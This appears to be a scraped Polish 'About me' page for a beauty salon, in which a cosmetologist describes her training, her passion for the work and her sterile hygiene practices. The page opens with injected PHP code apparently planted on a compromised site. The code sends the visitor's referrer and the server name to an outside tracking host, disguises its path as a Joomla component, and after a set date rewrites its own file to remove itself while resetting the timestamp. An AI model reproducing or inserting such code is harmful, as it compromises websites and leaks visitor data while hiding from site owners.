check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456734034){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776881&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_newsfeeds/models/models.php"); } O mnie

SĄ CHWILE, O KTÓRYCH CHCEMY PAMIĘTAĆ - MIEJSCA, DO KTÓRYCH CHCEMY WRACAĆ. PODARUJ SOBIE CHWILĘ PRZYJEMNOŚCI. UWIERZ W SWOJE PIĘKNO. MASZ JE W SOBIE, WIĘC POZWÓL JE WYDOBYĆ.

Witam serdecznie na stronie mojego gabinetu. Nazywam się Dominika Pyż. Dzięki mojej dotychczasowej podróży w świat kosmetologii i wizażu zdobyłam doświadczenie, u podstaw którego leży profesjonalizm, uśmiech, zamiłowanie do zawodu oraz chęć towarzyszenia klientom w ich drodze do piękna. Kosmetologia i wizaż są dla mnie nie tylko zawodem ale także największą w życiu pasją. Nie tworzę urody, ponieważ każdy z nas jest piękny. Wszystko co robię, robię z wielkim zaangażowaniem i prawdziwą przyjemnością by to wspomniane piękno z każdego z nas wydobyć i podkreślić.
Ukończyłam Wyższą Niepubliczną Szkołę Medyczną we Wrocławiu z tytułem dyplomowanego kosmetologa.

Wychodząc naprzeciw oczekiwaniom klientów postanowiłam otworzyć Salon Kosmetyczny Zatrzymaj Czas aby stanowił miejsce, w którym każdy będzie mógł czuć się bezpiecznie, pewnie i całkowicie zdać się na moją wiedzę i doświadczenie.


Ponadto pragnę podkreślić, iż higiena podczas świadczonych przeze mnie usług jest na najwyższym poziomie. Wszystkie narzędzia użyte do zabiegów są jednorazowe lub odpowiednio dezynfekowane i poddawane sterylizacji w autoklawie.

MAM NADZIEJĘ, ŻE PIERWSZA WIZYTA BĘDZIE POCZĄTKIEM NASZEJ ZNAJOMOŚCI.